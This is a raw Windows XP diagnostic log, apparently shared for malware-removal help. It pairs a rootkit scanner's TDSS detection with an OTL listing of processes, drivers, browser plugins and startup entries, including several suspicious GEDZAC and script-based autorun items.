11:50:25.0234 1896 Wdf01000 - ok
11:50:25.0234 1896 WDICA - ok
11:50:25.0281 1896 wdmaud (6768acf64b18196494413695f0c3a00f) C:\WINDOWS\system32\drivers\wdmaud.sys
11:50:25.0546 1896 wdmaud - ok
11:50:25.0593 1896 WebClient (77a354e28153ad2d5e120a5a8687bc06) C:\WINDOWS\System32\webclnt.dll
11:50:25.0875 1896 WebClient - ok
11:50:25.0968 1896 winmgmt (2d0e4ed081963804ccc196a0929275b5) C:\WINDOWS\system32\wbem\WMIsvc.dll
11:50:26.0250 1896 winmgmt - ok
11:50:26.0468 1896 WmdmPmSN (a477391b7a8b0a0daabadb17cf533a4b) C:\WINDOWS\system32\MsPMSNSv.dll
11:50:26.0500 1896 WmdmPmSN - ok
11:50:26.0531 1896 WmiAcpi (c42584fd66ce9e17403aebca199f7bdb) C:\WINDOWS\system32\DRIVERS\wmiacpi.sys
11:50:26.0781 1896 WmiAcpi - ok
11:50:26.0984 1896 WmiApSrv (e0673f1106e62a68d2257e376079f821) C:\WINDOWS\system32\wbem\wmiapsrv.exe
11:50:27.0234 1896 WmiApSrv - ok
11:50:27.0265 1896 WpdUsb (c1b3d9d75c3fb735f5fa3a5806aded57) C:\WINDOWS\system32\Drivers\wpdusb.sys
11:50:27.0312 1896 WpdUsb - ok
11:50:27.0328 1896 WS2IFSL (6abe6e225adb5a751622a9cc3bc19ce8) C:\WINDOWS\System32\drivers\ws2ifsl.sys
11:50:27.0593 1896 WS2IFSL - ok
11:50:27.0656 1896 wscsvc (7c278e6408d1dce642230c0585a854d5) C:\WINDOWS\system32\wscsvc.dll
11:50:27.0937 1896 wscsvc - ok
11:50:27.0968 1896 WSTCODEC (c98b39829c2bbd34e454150633c62c78) C:\WINDOWS\system32\DRIVERS\WSTCODEC.SYS
11:50:28.0234 1896 WSTCODEC - ok
11:50:28.0421 1896 wuauserv (35321fb577cdc98ce3eb3a3eb9e4610a) C:\WINDOWS\system32\wuauserv.dll
11:50:28.0703 1896 wuauserv - ok
11:50:28.0750 1896 WZCSVC (81dc3f549f44b1c1fff022dec9ecf30b) C:\WINDOWS\System32\wzcsvc.dll
11:50:29.0046 1896 WZCSVC - ok
11:50:29.0078 1896 xmlprov (295d21f14c335b53cb8154e5b1f892b9) C:\WINDOWS\System32\xmlprov.dll
11:50:29.0328 1896 xmlprov - ok
11:50:29.0531 1896 MBR (0x1B8) (5c616939100b85e558da92b899a0fc36) \Device\Harddisk0\DR0
11:50:29.0609 1896 \Device\Harddisk0\DR0 ( TDSS File System ) - warning
11:50:29.0609 1896 \Device\Harddisk0\DR0 - detected TDSS File System (1)
11:50:29.0625 1896 Boot (0x1200) (cc838f099443892519cb342248c6e643) \Device\Harddisk0\DR0\Partition0
11:50:29.0625 1896 \Device\Harddisk0\DR0\Partition0 - ok
11:50:29.0625 1896 ============================================================
11:50:29.0625 1896 Scan finished
11:50:29.0625 1896 ============================================================
11:50:29.0781 0368 Detected object count: 1
11:50:29.0781 0368 Actual detected object count: 1
11:51:59.0250 0368 \Device\Harddisk0\DR0 ( TDSS File System ) - skipped by user
11:51:59.0250 0368 \Device\Harddisk0\DR0 ( TDSS File System ) - User select action: Skip


OTL:
OTL logfile created on: 13/05/2012 12:06:57 PM - Run 1
OTL by OldTimer - Version 3.2.42.3 Folder = C:\Documents and Settings\Annie\My Documents\Downloads
Windows XP Home Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 6.0.2900.5512)
Locale: 00001009 | Country: Canada | Language: ENC | Date Format: dd/MM/yyyy

1013.99 Mb Total Physical Memory | 587.01 Mb Available Physical Memory | 57.89% Memory free
2.38 Gb Paging File | 2.07 Gb Available in Paging File | 86.93% Paging File free
Paging file location(s): C:\pagefile.sys 1524 3048 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 139.04 Gb Total Space | 15.29 Gb Free Space | 11.00% Space Free | Partition Type: NTFS

Computer Name: FELIX | User Name: Annie | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 90 Days

========== Processes (SafeList) ==========

PRC - [2012/05/13 11:59:18 | 000,595,456 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Annie\My Documents\Downloads\OTL.exe
PRC - [2012/05/12 20:31:28 | 000,030,721 | ---- | M] (GEDZAC) -- C:\WINDOWS\system32\sendi.exe
PRC - [2012/05/12 20:14:05 | 000,017,409 | ---- | M] (GEDZAC LABS) -- C:\WINDOWS\system32\regsrv.exe
PRC - [2012/02/14 19:03:14 | 024,246,216 | ---- | M] (Dropbox, Inc.) -- C:\Documents and Settings\Annie\Application Data\Dropbox\bin\Dropbox.exe
PRC - [2012/01/19 00:58:06 | 000,149,904 | ---- | M] (Microsoft ® Corporation) -- C:\Documents and Settings\Annie\Forefront UAG Remote Access Agent\iportalsickkidsca\internal1\uagqecsvc.exe
PRC - [2011/11/27 06:22:14 | 000,856,064 | ---- | M] (Lee-Soft.com) -- C:\Program Files\ViStart\ViStart.exe
PRC - [2009/02/12 00:20:52 | 000,862,728 | ---- | M] (Dritek System Inc.) -- C:\Program Files\Launch Manager\LManager.exe
PRC - [2008/07/03 15:58:22 | 000,094,208 | ---- | M] (sonix) -- C:\WINDOWS\PLFSetL.exe
PRC - [2008/04/15 17:54:42 | 000,354,840 | ---- | M] (Intel Corporation) -- C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTmon.exe
PRC - [2008/04/15 17:54:40 | 000,178,712 | ---- | M] (Intel Corporation) -- C:\Program Files\Intel\Intel Matrix Storage Manager\IAAnotif.exe
PRC - [2008/04/14 08:00:00 | 001,033,728 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\explorer.exe


========== Modules (No Company Name) ==========

MOD - [2003/06/07 01:30:08 | 000,057,344 | ---- | M] () -- C:\Program Files\Launch Manager\PowerUtl.dll


========== Win32 Services (SafeList) ==========

SRV - File not found [Disabled | Stopped] -- %SystemRoot%\System32\hidserv.dll -- (HidServ)
SRV - File not found [On_Demand | Stopped] -- %SystemRoot%\System32\appmgmts.dll -- (AppMgmt)
SRV - [2012/03/02 17:00:26 | 000,025,504 | ---- | M] (Samsung Electronics Co., Ltd.) [Auto | Stopped] -- C:\Program Files\Samsung\AllShare\AllShareDMS\AllShareDMS.exe -- (SamsungAllShareV2.0)
SRV - [2012/03/02 17:00:20 | 000,027,584 | ---- | M] (Samsung Electronics Co., Ltd.) [On_Demand | Stopped] -- C:\Program Files\Samsung\AllShare\AllShareSlideShowService.exe -- (SimpleSlideShowServer)
SRV - [2012/01/19 00:58:06 | 000,149,904 | ---- | M] (Microsoft ® Corporation) [Auto | Running] -- C:\Documents and Settings\Annie\Forefront UAG Remote Access Agent\iportalsickkidsca\internal1\uagqecsvc.exe -- (uagqecsvc)
SRV - [2008/04/15 17:54:42 | 000,354,840 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTmon.exe -- (IAANTMON) Intel®


========== Driver Services (SafeList) ==========

DRV - File not found [Kernel | On_Demand | Stopped] -- -- (WDICA)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\Rts5161ccid.sys -- (USBCCID)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\Rts516xIR.sys -- (Rts516xIR)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDRFRAME)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDRELI)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDFRAME)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDCOMP)
DRV - File not found [Kernel | System | Stopped] -- -- (PCIDump)
DRV - File not found [Kernel | System | Stopped] -- -- (lbrtfdc)
DRV - File not found [Kernel | System | Stopped] -- -- (Changer)
DRV - File not found [Kernel | On_Demand | Stopped] -- C:\ComboFix\catchme.sys -- (catchme)
DRV - File not found [Kernel | On_Demand | Unknown] -- C:\DOCUME~1\Annie\LOCALS~1\Temp\aswMBR.sys -- (aswMBR)
DRV - [2012/01/25 17:21:53 | 000,242,240 | ---- | M] (DT Soft Ltd) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV - [2009/10/12 16:21:54 | 000,100,736 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\ewusbdev.sys -- (hwusbdev)
DRV - [2009/09/10 15:55:52 | 000,102,528 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\ewusbmdm.sys -- (hwdatacard)
DRV - [2009/05/06 18:15:38 | 001,759,744 | ---- | M] () [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\snp2uvc.sys -- (SNP2UVC) USB2.0 PC Camera (SNP2UVC)
DRV - [2009/03/02 01:03:48 | 000,038,912 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\l1c51x86.sys -- (L1c)
DRV - [2009/02/24 04:49:44 | 005,032,448 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\RtkHDAud.sys -- (IntcAzAudAddService) Service for Realtek HD Audio (WDM)
DRV - [2009/02/20 04:53:18 | 001,952,512 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\BCMWL5.SYS -- (BCM43XX)
DRV - [2009/02/03 02:42:30 | 000,162,816 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\RtsUStor.sys -- (RSUSBSTOR)
DRV - [2008/08/05 08:10:12 | 001,684,736 | ---- | M] (Creative) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\Ambfilt.sys -- (Ambfilt)
DRV - [2006/11/02 09:27:36 | 000,020,112 | ---- | M] (Dritek System Inc.) [Kernel | System | Running] -- C:\Program Files\Launch Manager\DPortIO.sys -- (DritekPortIO)
DRV - [2006/01/04 03:41:48 | 001,389,056 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\Monfilt.sys -- (Monfilt)


========== Standard Registry (SafeList) ==========


========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm


IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0



IE - HKU\S-1-5-21-1313911845-3924064129-568730901-1006\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://homepage.gateway.com/rdr.aspx?b=ACGW&l=1009&m=lt20&r=0xph0511x415l03c4wuj5a48l2u599
IE - HKU\S-1-5-21-1313911845-3924064129-568730901-1006\..\SearchScopes,DefaultScope = {67A2568C-7A0A-4EED-AECC-B5405DE63B64}
IE - HKU\S-1-5-21-1313911845-3924064129-568730901-1006\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://search.live.com/results.aspx?q={searchTerms}&src=IE-SearchBox&Form=IE8SRC
IE - HKU\S-1-5-21-1313911845-3924064129-568730901-1006\..\SearchScopes\{67A2568C-7A0A-4EED-AECC-B5405DE63B64}: "URL" = http://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACGW_en
IE - HKU\S-1-5-21-1313911845-3924064129-568730901-1006\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7
IE - HKU\S-1-5-21-1313911845-3924064129-568730901-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

========== FireFox ==========

FF - prefs.js..browser.search.selectedEngine: "Wikipedia (en)"


FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\WINDOWS\system32\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin: C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.0.61118.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF - HKCU\Software\MozillaPlugins\@Skype Limited.com/Facebook Video Calling Plugin: C:\Documents and Settings\Annie\Local Settings\Application Data\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Update\1.3.21.111\npGoogleUpdate3.dll (Google Inc.)
FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Update\1.3.21.111\npGoogleUpdate3.dll (Google Inc.)

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{23fcfd51-4958-4f00-80a3-ae97e717ed8b}: C:\Program Files\DivX\DivX Plus Web Player\firefox\html5video [2011/05/08 17:15:42 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{6904342A-8307-11DF-A508-4AE2DFD72085}: C:\Program Files\DivX\DivX Plus Web Player\firefox\wpa [2011/05/08 17:15:42 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 8.0\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2011/11/11 11:22:11 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 8.0\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2012/05/10 18:40:14 | 000,000,000 | ---D | M]

[2011/05/06 01:03:37 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Annie\Application Data\Mozilla\Extensions
[2012/05/11 14:45:32 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Annie\Application Data\Mozilla\Firefox\Profiles\lk3zpup6.default\extensions
[2011/11/18 20:44:17 | 000,000,000 | ---D | M] (Browser Companion Helper) -- C:\Documents and Settings\Annie\Application Data\Mozilla\Firefox\Profiles\lk3zpup6.default\extensions\bbrs_002@blabbers.com
[2011/11/18 19:46:55 | 000,002,314 | ---- | M] () -- C:\Documents and Settings\Annie\Application Data\Mozilla\Firefox\Profiles\lk3zpup6.default\searchplugins\Messenger Plus Smartbar Search.xml
[2011/11/18 19:53:32 | 000,002,770 | ---- | M] () -- C:\Documents and Settings\Annie\Application Data\Mozilla\Firefox\Profiles\lk3zpup6.default\searchplugins\Plusnetwork.xml
[2012/05/10 18:40:15 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\extensions
[2012/05/10 20:29:45 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0032-ABCDEFFEDCBA}
[2012/02/20 12:39:14 | 000,061,705 | ---- | M] () (No name found) -- C:\DOCUMENTS AND SETTINGS\ANNIE\APPLICATION DATA\MOZILLA\FIREFOX\PROFILES\LK3ZPUP6.DEFAULT\EXTENSIONS\{B749FC7C-E949-447F-926C-3F4EED6ACCFE}.XPI
[2012/01/06 13:15:35 | 000,634,964 | ---- | M] () (No name found) -- C:\DOCUMENTS AND SETTINGS\ANNIE\APPLICATION DATA\MOZILLA\FIREFOX\PROFILES\LK3ZPUP6.DEFAULT\EXTENSIONS\{D10D0BF8-F5B5-C8B4-A8B2-2B9879E08C5D}.XPI
[2011/11/11 11:22:09 | 000,134,104 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll
[2011/05/18 19:03:07 | 000,472,808 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\mozilla firefox\plugins\npdeployJava1.dll
[2011/05/06 18:18:45 | 000,076,288 | ---- | M] (Foxit Software Company) -- C:\Program Files\mozilla firefox\plugins\npFoxitReaderPlugin.dll
[2011/10/10 23:53:49 | 000,002,252 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\bing.xml
[2011/11/11 11:22:10 | 000,002,040 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\twitter.xml

========== Chrome ==========

CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?{google:RLZ}{google:acceptedSuggestion}{google:originalQueryForSuggestion}{google:searchFieldtrialParameter}{google:instantFieldTrialGroupParameter}sourceid=chrome&ie={inputEncoding}&q={searchTerms}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}{google:instantFieldTrialGroupParameter}client=chrome&hl={language}&q={searchTerms}
CHR - plugin: Remoting Viewer (Enabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Chrome\Application\18.0.1025.168\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Chrome\Application\18.0.1025.168\pdf.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Chrome\Application\18.0.1025.168\gcswf32.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll
CHR - plugin: Java Deployment Toolkit 6.0.220.4 (Enabled) = C:\Program Files\Java\jre6\bin\new_plugin\npdeployJava1.dll
CHR - plugin: Java™ Platform SE 6 U22 (Enabled) = C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll
CHR - plugin: Foxit Reader Plugin for Mozilla (Enabled) = C:\Program Files\Mozilla Firefox\plugins\npFoxitReaderPlugin.dll
CHR - plugin: 2007 Microsoft Office system (Enabled) = C:\Program Files\Mozilla Firefox\plugins\NPOFF12.DLL
CHR - plugin: Microsoft\u00AE DRM (Enabled) = C:\Program Files\Windows Media Player\npdrmv2.dll
CHR - plugin: Microsoft\u00AE DRM (Enabled) = C:\Program Files\Windows Media Player\npwmsdrm.dll
CHR - plugin: Windows Media Player Plug-in Dynamic Link Library (Enabled) = C:\Program Files\Windows Media Player\npdsplay.dll
CHR - plugin: Facebook Video Calling Plugin (Enabled) = C:\Documents and Settings\Annie\Local Settings\Application Data\Facebook\Video\Skype\npFacebookVideoCalling.dll
CHR - plugin: Google Update (Enabled) = C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Update\1.3.21.99\npGoogleUpdate3.dll
CHR - plugin: DivX VOD Helper Plug-in (Enabled) = C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll
CHR - plugin: DivX Web Player (Enabled) = C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll
CHR - plugin: Windows Presentation Foundation (Enabled) = C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll
CHR - plugin: Shockwave for Director (Enabled) = C:\WINDOWS\system32\Adobe\Director\np32dsw.dll
CHR - plugin: Silverlight Plug-In (Enabled) = c:\Program Files\Microsoft Silverlight\5.0.61118.0\npctrl.dll
CHR - plugin: Default Plug-in (Enabled) = default_plugin
CHR - Extension: YouTube = C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2_0\
CHR - Extension: Google Search = C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.14_0\
CHR - Extension: DivX HiQ = C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\fnjbmmemklcjgepojigaapkoodmkgbae\2.1.1.94_0\
CHR - Extension: DivX Plus Web Player HTML5 \u003Cvideo\u003E = C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nneajnkjbffgblleaoojgaacokifdkhm\2.1.1.94_0\
CHR - Extension: Gmail = C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\6.1.3_0\

O1 HOSTS File: ([2012/05/12 19:43:25 | 000,000,027 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 localhost
O2 - BHO: (DivX Plus Web Player HTML5 <video>) - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
O2 - BHO: (DivX HiQ) - {593DDEC6-7468-4cdd-90E1-42DADAA222E9} - C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - No CLSID value found.
O4 - HKLM..\Run: [AllShareAgent] C:\Program Files\Samsung\AllShare\AllShareAgent.exe (Samsung Electronics Co., Ltd.)
O4 - HKLM..\Run: [AzMixerSel] C:\Program Files\Realtek\Audio\Drivers\AzMixerSel.exe (Realtek Semiconductor Corp.)
O4 - HKLM..\Run: [IAAnotif] C:\Program Files\Intel\Intel Matrix Storage Manager\IAAnotif.exe (Intel Corporation)
O4 - HKLM..\Run: [IMJPMIG8.1] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE (Microsoft Corporation)
O4 - HKLM..\Run: [Israfel] C:\WINDOWS\system32\Israfel.vbs ()
O4 - HKLM..\Run: [Kernel32] C:\WINDOWS\system32\Kernel32.win ()
O4 - HKLM..\Run: [LManager] C:\Program Files\Launch Manager\LManager.exe (Dritek System Inc.)
O4 - HKLM..\Run: [MSPY2002] C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe ()
O4 - HKLM..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE (Microsoft Corporation)
O4 - HKLM..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE (Microsoft Corporation)
O4 - HKLM..\Run: [PLFSetL] C:\WINDOWS\PLFSetL.exe (sonix)
O4 - HKLM..\Run: [snp2uvc] C:\WINDOWS\System32\csnp2uvc.dll ( )
O4 - HKU\S-1-5-21-1313911845-3924064129-568730901-1006..\Run: [AttachmentWiperiportal.sickkids.ca] C:\Documents and Settings\Annie\Forefront UAG Remote Access Agent\iportalsickkidsca\internal1\AttachmentWiper.exeBatchRun\run.bat ()
O4 - HKU\S-1-5-21-1313911845-3924064129-568730901-1006..\Run: [DAEMON Tools Lite] C:\Program Files\DAEMON Tools Lite\DTLite.exe (DT Soft Ltd)
O4 - HKU\S-1-5-21-1313911845-3924064129-568730901-1006..\Run: [Facebook Update] C:\Documents and Settings\Annie\Local Settings\Application Data\Facebook\Update\FacebookUpdate.exe (Facebook Inc.)
O4 - HKU\S-1-5-21-1313911845-3924064129-568730901-1006..\Run: [ViStart] C:\Program Files\ViStart\ViStart.exe (Lee-Soft.com)
O4 - Startup: C:\Documents and Settings\Annie\Start Menu\Programs\Startup\Dropbox.lnk = C:\Documents and Settings\Annie\Application Data\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DisableRegistryTools = 1
O7 - HKU\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O7 - HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O7 - HKU\S-1-5-18\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O7 - HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O7 - HKU\S-1-5-19\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-20\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-21-1313911845-3924064129-568730901-1006\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-21-1313911845-3924064129-568730901-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O7 - HKU\S-1-5-21-1313911845-3924064129-568730901-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O7 - HKU\S-1-5-21-1313911845-3924064129-568730901-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O8 - Extra context menu item: Google Sidewiki... - res://C:\Program Files\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_D183CA64F05FDD98.dll/cmsidewiki.html File not found
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos-beta/OnlineScanner.cab (Reg Error: Key error.)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_22-windows-i586.cab (Java Plug-in 1.6.0_22)
O16 - DPF: {CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_22-windows-i586.cab (Java Plug-in 1.6.0_22)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_22-windows-i586.cab (Java Plug-in 1.6.0_22)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.2.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{3AA83E36-B133-4B6B-AE31-87EE5B48BB90}: DhcpNameServer = 192.168.2.1
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\WINDOWS\system32\userinit.exe) - C:\WINDOWS\system32\userinit.exe (Microsoft Corporation)
O24 - Desktop WallPaper: C:\Documents and Settings\Annie\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O24 - Desktop BackupWallPaper: C:\Documents and Settings\Annie\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2009/08/03 13:28:56 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O35 - HKU\S-1-5-21-1313911845-3924064129-568730901-1006..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = ComFile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)

NetSvcs: 6to4 - File not found
NetSvcs: AppMgmt - %SystemRoot%\System32\appmgmts.dll File not found
NetSvcs: HidServ - %SystemRoot%\System32\hidserv.dll File not found
NetSvcs: Ias - File not found
NetSvcs: Iprip - File not found
NetSvcs: Irmon - File not found
NetSvcs: NWCWorkstation - File not found
NetSvcs: Nwsapagent - File not found
NetSvcs: WmdmPmSp - File not found

MsConfig - StartUpReg: DivXUpdate - hkey= - key= - C:\Program Files\DivX\DivX Update\DivXUpdate.exe ()
MsConfig - StartUpReg: VideoWebCamera - hkey= - key= - C:\Program Files\VideoWebCamera\VideoWebCamera.exe (Suyin)
MsConfig - State: "system.ini" - 0
MsConfig - State: "win.ini" - 0
